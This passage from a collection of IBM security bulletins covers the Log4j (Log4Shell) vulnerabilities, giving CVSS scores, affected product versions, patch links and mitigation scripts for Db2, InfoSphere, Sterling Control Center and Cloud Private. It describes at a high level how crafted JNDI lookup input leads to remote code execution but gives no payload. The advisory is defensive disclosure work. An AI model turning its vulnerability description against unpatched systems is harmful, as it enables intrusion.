VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"10.1, 10.5, 11.1, 11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T20:29:59", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-31T20:29:59", "id": "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "href": "https://www.ibm.com/support/pages/node/6528678", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nA vulnerability (Log4Shell) in Apache Log4j used by IBM InfoSphere Information Server was addressed. Various components in Information Server use Log4j to log messages for diagnostics. The fix upgrades log4j to version 2.16.0.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nInfoSphere Information Server, Information Server on Cloud | 11.7, 11.5, 11.3 \n \n \nInformation Server 11.5 and 11.3 are affected. Both releases are past end of service.\n\n## Remediation/Fixes\n\n_Product_ | _VRMF_ | _APAR_ | _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server, Information Server on Cloud | 11.7 | [JR64358](<http://www.ibm.com/support/docview.wss?uid=swg1JR64358> \"JR64358\" ) | \\--Apply IBM InfoSphere Information Server version [11.7.1.0](<https://www.ibm.com/support/pages/node/878310>) \n\\--Apply IBM InfoSphere Information Server version [11.7.1.3](<https://www.ibm.com/support/pages/node/6498109> \"11.7.1.3\" ) \n\\--Apply Information Server [11.7.1.3 Service pack 1](<https://www.ibm.com/support/pages/node/6527912>) \n \n \nNote: \n1\\. You should also apply the fix for other components (WebSphere Application Server, Db2, etc.) in your environment. See the Related information section for relevant bulletins; however, it is best to check the [IBM PSIRT blog](<https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/> \"IBM PSIRT blog\" ) for any updated information from these components. \n2\\. The Update installer uses the **Updates folder** within your Information Server location to keep copies of files that are replaced during patch installs. The files in the Updates folder are used to roll back a patch installation; they are not needed while Information Server is used. Likewise, the **_uninstall folder** contains files that are only used while uninstalling Information Server components. \nFor log4j related patches, the prior vulnerable versions of log4j could be present in these folders. If you want to remove such files from the system, take a backup of these folders and then purge the folders. \nAn appropriate backup of the Updates folder must be restored before any subsequent patch rollback action. Likewise, an appropriate backup of the _uninstall folder must be restored before any subsequent uninstall action.\n\n## Workarounds and Mitigations\n\n**Note: \n1\\. The following steps can be done to mitigate the vulnerability. However, we strongly recommend applying the fix on top of 11.7.1.3.** \n**2\\. It is imperative that the mitigation or fix be applied as soon as possible.** \n3\\. The Update installer uses the **Updates folder** within your Information Server location to keep copies of files that are replaced during patch installs. The files in the Updates folder are used to roll back a patch installation; they are not needed while Information Server is used. Likewise, the **_uninstall folder** contains files that are only used while uninstalling Information Server components. \nFor log4j related patches, the prior vulnerable versions of log4j could be present in these folders. If you want to remove such files from the system, take a backup of these folders and then purge the folders. \nAn appropriate backup of the Updates folder must be restored before any subsequent patch rollback action. Likewise, an appropriate backup of the _uninstall folder must be restored before any subsequent uninstall action. \n \n \n**Steps:** \n \n \n1\\. **Applicability of the mitigation steps**: \n\n * These steps can be applied to any 11.7 or 11.5 or 11.3 installation.\n * If you have a Microservices tier (available since 11.7), follow the instructions in step 8 to mitigate the Microservices tier.\n\n2\\. **Script information**: \nTo mitigate the vulnerability, the JndiLookup.class must be removed from all instances of log4j 2.x jars. \nA UNIX script, iis-log4j-mitigation.sh, is provided to make it convenient to remove the class. After using the script, check the system for any log4j instances that contain the class. \nFor Windows, a PowerShell script, iis-log4j-mitigation.ps1 is provided. \nThere are other vulnerable classes in log4j 1.x jars, JMSAppender and SocketServer, that were reported in CVE-2021-4104. Information Server releases are not vulnerable to this CVE. However, the script will also remove these classes. \nWe estimate that the script should take less than 20 minutes to execute. \n \nUsage: \niis-log4j-mitigation.sh -i|-install-dir &lt;path&gt; [-w|-work-dir &lt;working-dir-path&gt;] [-l|-log4j-version &lt;1|2&gt;] [-r|-remove] \n\niis-log4j-mitigation.sh -help \n \nwhere \n&lt;path&gt; is the absolute path to the InfoSphere Information Server or WebSphere installation location. \nYou should run the script against each location. \n&lt;working-dir-path&gt; is the location for a temporary work directory used by the script. \nWe estimate that a minimum of 1G disk space is needed in the work directory. \n-log4j-version specifies the Apache Log4j version, '1' or '2', to mitigate. \nBy default, both log4j versions are mitigated. Script version 1.1 or later is needed to use this option. \n-remove should be specified to remove the classes. \nIf not specified, the script will only list the locations where the classes are found. \n-help provides information on usage and requirements \n \n3\\. **Backup**: \nTake a backup of your Information Server and WebSphere Application Server directories. \n\n4\\. **Where to run the script and how to use it**: \nThe script should be run on the Information Server Services, Engine and Client tiers. \nThe script should also be run against the directory where WebSphere Application Server is located, assuming that it is not in the same directory tree as Information Server.\n\na. Stop Information Server. Ensure that no Information Server services or processes are running. \nb. For each tier/install location, first, run the script without the remove option to list all locations of the classes. \nNote the owner of the jars containing these classes. \nc. Next, as the jar owner, run the script with the \u2013remove option to remove the classes from these locations. \nd. Finally, run the script again without the remove option to check whether any locations are reported. \ne. Manually check the system for any log4j instances that contain the classes. \nf. Restart Information Server. \n \n5\\. **Pre-requisites**: \n\nFor UNIX:\n\nSome of the steps in the script need zip, unzip and bash to be run. \nYou may need to install zip, unzip and bash on UNIX systems.\n\n6\\. **Download script**:\n\nDownload the script for your platform to a directory that is not in the paths to be scanned.\n\nFor UNIX:\n\n \n_iis-log4j-mitigation.sh _\n\nFor Windows:\n\n \n_iis-log4j-mitigation.ps1_\n\n \nAfter the script is downloaded, examine the script properties (Alt+Enter or right-click -&gt; Properties), and check whether there is a security notification at the bottom of the General tab that indicates: \n_This file came from another computer and might be blocked to help protect this computer._\n\nIf the security notification is present, do one of the following:\n\n * Check the Unblock check box. \nClick Apply.\n\n \n\n\n * or Set the execution policy in the PowerShell window to Unrestricted:\n \n \n Set-ExecutionPolicy -ExecutionPolicy Unrestricted\n\nYou may still be prompted to accept execution of the script each time you run the script.\n\n \n\n\n7\\. **Apply mitigation (Services, Engine, Client tiers):**\n\nPerform the following actions on the tier indicated.\n\n### **Services Tier**\n\nRun the script against your services tier location, as indicated in step 4 above. \n\n\n** Address WebSphere Application Server:** \nRun the script against your WebSphere installation location, as indicated in step 4 above. \n \nWebSphere fixes for the log4j vulnerability should be applied per WebSphere security bulletins. They may require upgrading your WebSphere version prior to applying the fix. A list of WebSphere bulletins is provided in the Related Information section. \nFor advice on various WebSphere security fixes for log4j vulnerabilities, see [https://www.ibm.com/support/pages/node/6525860](<https://www.ibm.com/support/pages/node/6525860>). \na. Apply the [latest WebSphere fix](<https://www.ibm.com/support/pages/node/6526750>) (PH42762) for log4j (even if you applied the original fix PH42728). \nb. Additionally, \nFor Liberty profile, apply [https://www.ibm.com/support/pages/node/6526824](<https://www.ibm.com/support/pages/node/6526824>) (PH42759) \nFor Network Deployment profile, apply [https://www.ibm.com/support/pages/node/6528220](<https://www.ibm.com/support/pages/node/6528220>) (PH42899)\n\n**Update Solr if you do not have a Microservices tier:**\n\n 1. Change directory to &lt;INSTALL_LOCATION&gt;/shared-open-source/solr/install/bin\n 2. Edit the solr scripts solr.in.sh or solr.in.cmd \nUNIX \nAppend _SOLR_OPTS=\"$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true\" \n_Windows \nAppend _set SOLR_OPTS=%SOLR_OPTS% -Dlog4j2.formatMsgNoLookups=true_\n 3. Restart the services \n \nLINUX \n/shared-open-source/bin/stop-linux-services.sh \n/shared-open-source/bin/start-linux-services.sh \nAIX \n/shared-open-source/bin/stop-aix-services.sh \n/shared-open-source/bin/start-aix-services.sh \nWindows \n/shared-open-source/bin/stop-windows-services.bat \n/shared-open-source/bin/start-windows-services.bat\n\n** Engine tier**\n\nRun the script as indicated in step 4 above.\n\n** Client tier**\n\nRun the script as indicated in step 4 above.\n\n8\\. **Apply mitigation (Microservices tier):**\n\nIf you have the Microservices tier installed, download the archive (ms-tier-log4shell-scripts-0.1.0.tar.gz) to mitigate the vulnerability on the Microservices tier. The archive contains several scripts and a readme file which explains how to use the scripts. You can apply this mitigation even if you applied the instructions in an earlier version of this bulletin.\n\nCopy the archive to a new directory on the system that is running the Microservices tier, uncompress it and extract the contents.\n\nRead the instructions in the README.md file.\n\nRun the scripts under the same user id that installed the Microservices tier (the user id that runs kubectl commands).\n\nNote: The Microservices tier only runs on Linux.\n\nms-tier-log4shell-scripts-0.1.0.tar.gz\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nWebSphere bulletins: \n[WebSphere advice and FAQ on addressing log4j vulnerabilities](<https://www.ibm.com/support/pages/node/6525860>) \n[WebSphere bulletin for log4j - PH42762 (supersedes PH42728)](<https://www.ibm.com/support/pages/node/6526750>) \n[ ](<https://www.ibm.com/support/pages/node/6525706>)Additional fix for Liberty: <https://www.ibm.com/support/pages/node/6526824>\n\nAdditional fix for Network Deployment: <https://www.ibm.com/support/pages/node/6528220>\n\nDb2 bulletins:\n\nDb2 V11.5 has been identified to be vulnerable in some circumstances. (Reference: <https://www.ibm.com/support/pages/node/6526462>). \nThe configuration of Db2 V11.5 used by IBM InfoSphere Information Server does not include the vulnerable configuration.\n\n## Change History\n\n16 Dec 2021: Initial Publication \n17 Dec 2021: Updated bulletin to indicate that mitigation can also be done on 11.7.1.1 and 11.7.1.2 installations \nAdditional command needs to be executed on Microservices tier for platform-services sts elasticsearch \nFix will be applicable to 11.7.1.3 installations. \nAdded Related WebSphere security bulletins \n18 Dec 2021: 11.5 release is affected \n20 Dec 2021: On AIX, zip may have to be installed in order to do some of the steps. Clarified possible break in product features. \n21 Dec 2021: If no Microservices tier, for Solr, an AIX specific script must be used to restart shared open source components \nAdd 6528220 and 6526824 to the list of relevant WebSphere bulletins; stops loading of JndiLookup class \nMicroservices tier mitigation is limited to 11.7.1.1 Service Pack 2 and 11.7.1.3 installations \n22 Dec 2021: Steps updated with new script, no need to set custom properties or environment flags, coverage for 11.7, 11.5, 11.3 \n23 Dec 2021: Mitigation script for Windows added; clarification regarding Db2 security bulletin added. \n24 Dec 2021: Updated the instructions for mitigating the Microservices tier. \n28 Dec 2021: Updated taxonomy, updated description and information of WebSphere fixes \n30 Dec 2021: Owner of jar should run the script, Windows script replaced with manual steps \n31 Dec 2021: Not vulnerable to CVE-2021-4104 but the script will remove the related classes \nUpdated script iis-log4j-mitigation.sh: new option -log4j-version to mitigate specific version of log4j \n06 Jan 2022: Fix published for 11.7.1.3 \n07 Jan 2022: Updated summary to indicate that the fix deploys log4j 2.16.0 \n11 Jan 2022: Removed caution that product features may break with the mitigation/fix, as no such occurrence \nAdded new mitigation script for Windows that does not use zip and unzip \nBackup and purge the Updates folder if you want to remove vulnerable log4j jars from there \n14 Jan 2022: Also, backup and purge the _uninstall folder to remove vulnerable log4j jars from there \n18 Jan 2022: Removed caution that mitigation does not cover all relevant situations \n20 Jan 2022: Removed link to original WebSphere bulletin, added pointer to Related information section and blog \n21 Jan 2022: Changed title of step 1 from \"Upgrade IBM InfoSphere Information Server\" to \"Applicability of the mitigation steps\" \n26 Jan 2022: Updated 1.2 version of Windows mitigation script has better error handling of some situations \n\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZJPZ\",\"label\":\"IBM InfoSphere Information Server\"},\"ARM Category\":[{\"code\":\"a8m50000000L0sjAAC\",\"label\":\"Security Bulletins\"}],\"ARM Case Number\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.3.0;11.3.1;11.5.0;11.7.0;11.7.1\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-26T18:23:41", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Log4j affects IBM InfoSphere Information Server (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-26T18:23:41", "id": "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "href": "https://www.ibm.com/support/pages/node/6527372", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nApache Log4j Vulnerability Affects IBM Sterling Control Center (CVE-2021-45046). Customers are encourages to take action and apply the fix below. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Control Center| 6.1.3 \nIBM Control Center| 6.2.1.0 \nIBM Control Center| 6.2.0.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now. \n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**iFix**\n\n| \n\n**Remediation** \n \n---|---|---|--- \n \nIBM Sterling Control Center\n\n| \n\n6.2.1.0.\n\n| \n\niFix03\n\n| \n\n[Fix Central - 6.2.1.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.1.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.2.0.0\n\n| \n\niFix13\n\n| \n\n[Fix Central - 6.2.0.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.0.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.1.3.0\n\n| \n\niFix09\n\n| \n\n[Fix Central - 6.1.3.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.1.3.0&platform=All&function=all>) \n \nPlease NOTE: \n\nThe fix packages listed above also includes the fix for related Log4j vulnerability CVE-2021-44228 (originally addressed in the previous iFix number). \n\nSee: <https://www.ibm.com/support/pages/node/6527966>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.2.0.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.1.3.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.2.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T17:02:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling Control Center (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T17:02:49", "id": "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "href": "https://www.ibm.com/support/pages/node/6529304", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-28T23:39:21", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library. The library is used by Elasticsearch, a dependency of IBM Cloud Private, for logging messages to files. This bulletin identifies the security fixes to apply to address the Log4Shell vulnerability (CVE-2021-45046). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Private| 3.1.0 \nIBM Cloud Private| 3.1.1 \nIBM Cloud Private| 3.1.2 \nIBM Cloud Private| 3.2.0 \nIBM Cloud Private| 3.2.1 CD \nIBM Cloud Private| 3.2.2 CD \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nThe recommended solution involves the IBM Cloud Private ibm-icplogging component. It is recommended that you follow the instructions for the component in the links listed below:\n\nFor IBM Cloud Private 3.1.0: [IBM Cloud Private 3.1.0 Patch](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.0-build600961-51486&includeSupersedes=0> \"IBM Cloud Private 3.1.0 Patch\" )\n\nFor IBM Cloud Private 3.1.1: [IBM Cloud Private 3.1.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.1-build600916-51406&includeSupersedes=0> \"IBM Cloud Private 3.1.1 Patch\" )\n\nFor IBM Cloud Private 3.1.2: [IBM Cloud Private 3.1.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.2-build600891-51342&includeSupersedes=0> \"IBM Cloud Private 3.1.2 Patch\" )\n\nFor IBM Cloud Private 3.2.0: [IBM Cloud Private 3.2.0 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.0-build600917-51405&includeSupersedes=0> \"IBM Cloud Private 3.2.0 Patch\" )\n\nFor IBM Cloud Private 3.2.1: [IBM Cloud Private 3.2.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.1-build600890-51324&includeSupersedes=0> \"IBM Cloud Private 3.2.1 Patch\" )\n\nFor IBM Cloud Private 3.2.2: [IBM Cloud Private 3.2.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.2-build600889-51343&includeSupersedes=0> \"IBM Cloud Private 3.2.2 Patch\" )\n\nFor IBM Cloud Private 3.1.0:\n\n * Upgrade to the latest Continuous Delivery (CD) update package, IBM Cloud Private 3.2.2. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.2.1 and 3.2.2**\n\nThe ibm-icplogging component has been updated to use Elasticsearch 6.8.22. This release upgrades the Log4j package to 2.17.0, which remediates the log4j vulnerabilities and should not trigger false positives in vulnerability scanners as was the case with Elasticsearch 6.8.21. \n\nElasticsearch announcement (ESA-2021-31)\n\n<https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.1.0, 3.1.1, 3.1.2, and 3.2.0**\n\nElasticsearch and Logstash within ibm-icplogging component have been updated to remediate the log4j vulnerabilities by removing the vulnerable JndiLookup class from the log4j-core package. Some vulnerability scanners may continue to flag Elasticsearch in association with this vulnerability based on the Log4j version alone. However, the mitigation sufficiently protects both remote code execution and information leakage.\n\nElasticsearch 5.0.0-5.6.10 and 6.0.0-6.3.2: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/elasticsearch-5-0-0-5-6-10-and-6-0-0-6-3-2-log4j-cve-2021-44228-cve-2021-45046-remediation/292054>\n\nLogstash 5.0.0-6.8.20 and 7.0.0-7.16.0: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/logstash-5-0-0-6-8-20-and-7-0-0-7-16-0-log4j-cve-2021-44228-cve-2021-45046-remediation/292343>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) 